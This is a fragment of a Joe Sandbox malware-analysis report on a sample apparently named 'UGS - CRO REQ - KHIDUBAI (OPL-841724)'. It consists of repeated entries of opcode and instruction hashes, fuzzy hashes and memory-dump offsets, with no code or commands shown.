                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c3df545913ce3d66e2f45f97953b40351ba0834aed0f4d5d5137c6373071ff32
                                                                                                                                                    • Instruction ID: d253edc4988c525fae303174d5be278c7b21125c4e31a9d5a1644c572dc7b37c
                                                                                                                                                    • Opcode Fuzzy Hash: c3df545913ce3d66e2f45f97953b40351ba0834aed0f4d5d5137c6373071ff32
                                                                                                                                                    • Instruction Fuzzy Hash: 3C218C75D05209CFDB08DFA9D8482EEBBF1FB88320F04846AD445B3298D7751A46CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f9f4e276c68f69528c3313b34220e0cdea095cf6a8fb02c79616c5d869a07110
                                                                                                                                                    • Instruction ID: 06efb75003fa5b3abd72f94c6450df1476ea594e2a40cc5c023a6ec7e5c5b1d5
                                                                                                                                                    • Opcode Fuzzy Hash: f9f4e276c68f69528c3313b34220e0cdea095cf6a8fb02c79616c5d869a07110
                                                                                                                                                    • Instruction Fuzzy Hash: 0B215772A042089FC719DFA4D454CDEBBF9FF89310F01456AE516D7261E630AD05CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5781a37dbe2f950cc19ad2fb71436beb820c9724de7b8bb4c0c87166287d06f6
                                                                                                                                                    • Instruction ID: fb9f966dab259466a3ae86a485f89517b5a67f3720303a271dbc46275aff4b49
                                                                                                                                                    • Opcode Fuzzy Hash: 5781a37dbe2f950cc19ad2fb71436beb820c9724de7b8bb4c0c87166287d06f6
                                                                                                                                                    • Instruction Fuzzy Hash: 5731F470A42218CFEB64DF19C8887EDB7F2AF4A304F5551E9CA48A7260CB716AC0CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 27fb87c099bb195d018c27cb806b9de0bff87b50f8c6619821b851fae8cc8bb4
                                                                                                                                                    • Instruction ID: 7fabd2bafb01e8c00c15d93108610b36d2301fac9869aea21d216eea89f3b357
                                                                                                                                                    • Opcode Fuzzy Hash: 27fb87c099bb195d018c27cb806b9de0bff87b50f8c6619821b851fae8cc8bb4
                                                                                                                                                    • Instruction Fuzzy Hash: F3215E75A006189FCB14DF69C448ADD7BB2FF8C320F148669E811A7394DB759C46CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1c9170512df10fa313c6d51c197858ff0e5a9fd5a89cc6068ab2a43dbfc8db5b
                                                                                                                                                    • Instruction ID: f85f0acd3d350f6c23f525a4b07edd5dd2dd5f07501466229445eb530a37eebb
                                                                                                                                                    • Opcode Fuzzy Hash: 1c9170512df10fa313c6d51c197858ff0e5a9fd5a89cc6068ab2a43dbfc8db5b
                                                                                                                                                    • Instruction Fuzzy Hash: 9A216A75D00209CFDB08DFA9D8482EEBBF6FB88320F048429D445B3248D7751A42CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a8f6290bd30f8d59b4cace91ae16747faced74a564b10d552e89a098747790b2
                                                                                                                                                    • Instruction ID: 8b6bac0837ff248d3cab40478cd410b400f5b62dba429240f8178580d22eb45a
                                                                                                                                                    • Opcode Fuzzy Hash: a8f6290bd30f8d59b4cace91ae16747faced74a564b10d552e89a098747790b2
                                                                                                                                                    • Instruction Fuzzy Hash: F02114B4E0420ACFCB14DFA9D4856AEBBB6FF88300F14C5A9C815A7359D7369981CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ce4c6af4c063f32ae798813e7066fe75f5170dd67dac2c875cb15845a5334f59
                                                                                                                                                    • Instruction ID: 525cab019c805f07d6bad20289723b9c3d00d86f538254c2fee82223b9beba28
                                                                                                                                                    • Opcode Fuzzy Hash: ce4c6af4c063f32ae798813e7066fe75f5170dd67dac2c875cb15845a5334f59
                                                                                                                                                    • Instruction Fuzzy Hash: 96215870E09248DFDB04DFA9D8846ADBFB5EF89310F1482AAC459973A9D7368981CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d272c37d2157913c8839f8c5376a698a658555e229f51b6c1c54721ad6048c59
                                                                                                                                                    • Instruction ID: eab8763bd01bf3a85dced40c118b73fd2bddba6b7979c19c9f4cdcdc3479b79a
                                                                                                                                                    • Opcode Fuzzy Hash: d272c37d2157913c8839f8c5376a698a658555e229f51b6c1c54721ad6048c59
                                                                                                                                                    • Instruction Fuzzy Hash: A921D4707003045FD764EB69D8057AE7BF5EFC4310F50893DE01AD7689DB75A9068B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c19a4c75e5a39318f854896458a41e1177ff37a0f1bc81d6e2c1b24adce89ca7
                                                                                                                                                    • Instruction ID: 0f5c162be725de2bbe80e95e40273652228ddc9e7b95fa2c23723744f68728e5
                                                                                                                                                    • Opcode Fuzzy Hash: c19a4c75e5a39318f854896458a41e1177ff37a0f1bc81d6e2c1b24adce89ca7
                                                                                                                                                    • Instruction Fuzzy Hash: 1121CD30B006058FCB15EF68D884AAEB7F2EFC9310F15416AE506D73A5DB71AD46CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d59227fca9b1392ded747cc6f3c74ccf94e552fc6c59da8dc3e80c4ef6938103
                                                                                                                                                    • Instruction ID: d96d088aef874180f6f74405e0d10703e76ea215274c77a8a0ee04542da8c597
                                                                                                                                                    • Opcode Fuzzy Hash: d59227fca9b1392ded747cc6f3c74ccf94e552fc6c59da8dc3e80c4ef6938103
                                                                                                                                                    • Instruction Fuzzy Hash: BE112971B403459FDB18DF29D8809AE7FB1AF85210B05417AED55C72A5DB35C81ACB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9262c7e531f06ee08f2fca693b185cb31f2b77b143d3ecd2c224b2b62ffbc026
                                                                                                                                                    • Instruction ID: f5bf27fbbc53617c23b80a60ec328e49f4040aa96006e4e6322bbaa879cafda2
                                                                                                                                                    • Opcode Fuzzy Hash: 9262c7e531f06ee08f2fca693b185cb31f2b77b143d3ecd2c224b2b62ffbc026
                                                                                                                                                    • Instruction Fuzzy Hash: 8521F7B4E45A29CFDB34CF21CD947A9B6B1BB48305F0454E5C20DA2350EB706E99CF09
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 839e1a7bf97592905a8865d3460cb0340cd46b191bdfbd5902bf4882b27d376a
                                                                                                                                                    • Instruction ID: 3a850f64a549a87b150bb2197bf48adbbd28a9c5d2da3fb9f294a4ab939101e6
                                                                                                                                                    • Opcode Fuzzy Hash: 839e1a7bf97592905a8865d3460cb0340cd46b191bdfbd5902bf4882b27d376a
                                                                                                                                                    • Instruction Fuzzy Hash: 4611B635B007049FCB609FA998457AE7BF2AF88711F10412AE905DB384FB75ED42CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 62b4ca687cf1354351ea478b562af627aa202664d89c03aa59229a718a74f727
                                                                                                                                                    • Instruction ID: a5b3d2b3a860610819bb2d007af833060882e57bf4d91755e3fee4f1daccf05f
                                                                                                                                                    • Opcode Fuzzy Hash: 62b4ca687cf1354351ea478b562af627aa202664d89c03aa59229a718a74f727
                                                                                                                                                    • Instruction Fuzzy Hash: 2F215E78D05218EFDB40DFAAD5487EEBBF5FB48304F1484AAD019A3345E7784A41CB05
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5a27e1a83f4973e5fc95d63721a08b3c5cbb91253aa39c184de4a9bbac64c959
                                                                                                                                                    • Instruction ID: 07426d4f1ae61513b0b1f3b868234b2ce596e1e79bc30d927d96b19fa195fda0
                                                                                                                                                    • Opcode Fuzzy Hash: 5a27e1a83f4973e5fc95d63721a08b3c5cbb91253aa39c184de4a9bbac64c959
                                                                                                                                                    • Instruction Fuzzy Hash: 2E110775D04219CBCB44CF99D854AEEFBB6FB88310F10803AD505B3250E738695ACBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a2131789faac9a7ba535f0d64013cfaac1f8eecb0ef147c9362c22044d1b5188
                                                                                                                                                    • Instruction ID: 45a751950da39097babcce870c58cba47a0e72a12ff22399b1f8fffe81eaa062
                                                                                                                                                    • Opcode Fuzzy Hash: a2131789faac9a7ba535f0d64013cfaac1f8eecb0ef147c9362c22044d1b5188
                                                                                                                                                    • Instruction Fuzzy Hash: 94215CB0A01608EFCB14DFA8D584ADEBBF1BF48310F20452AE411A7390E770AD45CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 12e50e5ec2a246c2bd1a369888db91b379e91e754aad26e7ae4baefdc6f78c53
                                                                                                                                                    • Instruction ID: 32f421c5d583b7cb065281181b399495b6be9cae274155199e7e542ec0fa2f34
                                                                                                                                                    • Opcode Fuzzy Hash: 12e50e5ec2a246c2bd1a369888db91b379e91e754aad26e7ae4baefdc6f78c53
                                                                                                                                                    • Instruction Fuzzy Hash: AE115E353006008BCB2A6B39E818A7E37A6EBC9765315403AF906CB761DF35DD43CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5d28e3691c49c554d3b9b965f6cd7d790e4319e68bf1ee37c405594f43291111
                                                                                                                                                    • Instruction ID: eab3ef28c9ca70271afaf08f5bd03eab2ce8898595c690dc1d520c0f209df62a
                                                                                                                                                    • Opcode Fuzzy Hash: 5d28e3691c49c554d3b9b965f6cd7d790e4319e68bf1ee37c405594f43291111
                                                                                                                                                    • Instruction Fuzzy Hash: 74219278A02659EFDB04CF68D594EAEB7F2BF49300F204158E806AB365DB30AD45CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8af104d2a8b05098b164212b03fb4b3b27fbba5b48c1b7927bc0193db54ddbc9
                                                                                                                                                    • Instruction ID: ac4f85d20aeb300bf35fbf0ca8d437a02714ef2f77d07ca10327bb160528f71c
                                                                                                                                                    • Opcode Fuzzy Hash: 8af104d2a8b05098b164212b03fb4b3b27fbba5b48c1b7927bc0193db54ddbc9
                                                                                                                                                    • Instruction Fuzzy Hash: 5111CE39B026049FCB25CFA9E94488DB7B6FF88310B10056AE815A7350EA32ED11CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2d414dd8475441d40372e87db4b83b9fb51e3cdff0fd1f1314987355b29a84bf
                                                                                                                                                    • Instruction ID: 29ffa8c8f8d8b05e8647461d0cf49d0591df400307b20ab9eda5f93ec915d3b4
                                                                                                                                                    • Opcode Fuzzy Hash: 2d414dd8475441d40372e87db4b83b9fb51e3cdff0fd1f1314987355b29a84bf
                                                                                                                                                    • Instruction Fuzzy Hash: B601243630E3C01FC30787B9986095A7FB1AF9664034948EFD088CF393DA549D0ACBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 181a44c4e9c882b0d7e9b0dba7481ea65d794067ea72099d49cac492793765cb
                                                                                                                                                    • Instruction ID: 191c42688765bd7fc664f8e9de6b3469f88098fadb09af8d0fe78f34be593836
                                                                                                                                                    • Opcode Fuzzy Hash: 181a44c4e9c882b0d7e9b0dba7481ea65d794067ea72099d49cac492793765cb
                                                                                                                                                    • Instruction Fuzzy Hash: 7D018476340718AFDB109E59EC84F9E77A9FB88720F108066FA15CB290C6B1D811CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ab24aab0f6dc4ec69e0793df19cc0f4e4ea51939a04d13d61c7cfb42689c1c3f
                                                                                                                                                    • Instruction ID: ef0e27ad043c8010ff6bf0f9d10ebbdede7f2418dc45f68e224ead26a95bb452
                                                                                                                                                    • Opcode Fuzzy Hash: ab24aab0f6dc4ec69e0793df19cc0f4e4ea51939a04d13d61c7cfb42689c1c3f
                                                                                                                                                    • Instruction Fuzzy Hash: 9A21F674D05229CFDB20CFA5E950BAEBBF0FB09300F2044AAE419A7249E7355D859F50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ea0f0553872325b8f50cf04e9231067cc3d9170674971168c43b262ca3a52f52
                                                                                                                                                    • Instruction ID: d6ed7ccbecc3d159dcda2bbbc59f001ba5a1f2ce09a52b098a0a5202dc9bc647
                                                                                                                                                    • Opcode Fuzzy Hash: ea0f0553872325b8f50cf04e9231067cc3d9170674971168c43b262ca3a52f52
                                                                                                                                                    • Instruction Fuzzy Hash: 63114C70A002598FCF46EFA8C841AADBBF1BF883047558969D449EB351EB38D9028F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 83ae9bdec038ae82b5cab493d0e9dcff89ad1d4b86186f7dce882f40b7f2525b
                                                                                                                                                    • Instruction ID: 00ec4b2316f038050651f962184f3363d07dc026cc7a5ebce770a9f99db5b904
                                                                                                                                                    • Opcode Fuzzy Hash: 83ae9bdec038ae82b5cab493d0e9dcff89ad1d4b86186f7dce882f40b7f2525b
                                                                                                                                                    • Instruction Fuzzy Hash: D5112A70A002598F8F46EFA9C441AADBBF1FF883047148969D409EB315EB35DD428FD5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3a1e29a05c27b89adf4bc060770adf664afa42d40ddc2e8eb8abd95f9b606f5a
                                                                                                                                                    • Instruction ID: 731e71067266b007ec178234036b65477e5239fbd23f21e917790dd96aebc101
                                                                                                                                                    • Opcode Fuzzy Hash: 3a1e29a05c27b89adf4bc060770adf664afa42d40ddc2e8eb8abd95f9b606f5a
                                                                                                                                                    • Instruction Fuzzy Hash: 79015E30C09248DFCB15EFB8D5562ACBFB4EB4A201F1082EAC848A7755E7364A55CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cce9083cf5f5874d01ada7abc43e6290de5ae6beb5a46e6d1d65afdecdbe8d8b
                                                                                                                                                    • Instruction ID: 84116805994192f6ff3ca04339f1dca1564e51a1ad70248ad424da4f7fe4ac98
                                                                                                                                                    • Opcode Fuzzy Hash: cce9083cf5f5874d01ada7abc43e6290de5ae6beb5a46e6d1d65afdecdbe8d8b
                                                                                                                                                    • Instruction Fuzzy Hash: CC115B70E09349CFDB15DFB9D9812ADBFF1AB89300F1481AAC449E6259D2354581CF81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5cbcbae1f9e8f40ce50e5b8e39e935c7876e90b3a7e9c60a4efcc705b4249617
                                                                                                                                                    • Instruction ID: 68cae29a3d392e07603cce88479f8360b0dffdd3d979fdd97c46281e583abc62
                                                                                                                                                    • Opcode Fuzzy Hash: 5cbcbae1f9e8f40ce50e5b8e39e935c7876e90b3a7e9c60a4efcc705b4249617
                                                                                                                                                    • Instruction Fuzzy Hash: C7011A71D093998FCB42CFA588602ED7FB0AF11320F1941ABC558DB1D2E7389A59DB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3d1d982cd1643caf6137d2770f1449071aef950e01908be47953ade194da8cc8
                                                                                                                                                    • Instruction ID: fce0e69f455b06b9954ec3afa5c783e0d067f7034526bee71cf2253045d19e5c
                                                                                                                                                    • Opcode Fuzzy Hash: 3d1d982cd1643caf6137d2770f1449071aef950e01908be47953ade194da8cc8
                                                                                                                                                    • Instruction Fuzzy Hash: 9421E074901229CFDBA4EF64C888BEAB7B5AB48305F1080E9E41DA7344D7B45EC5CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
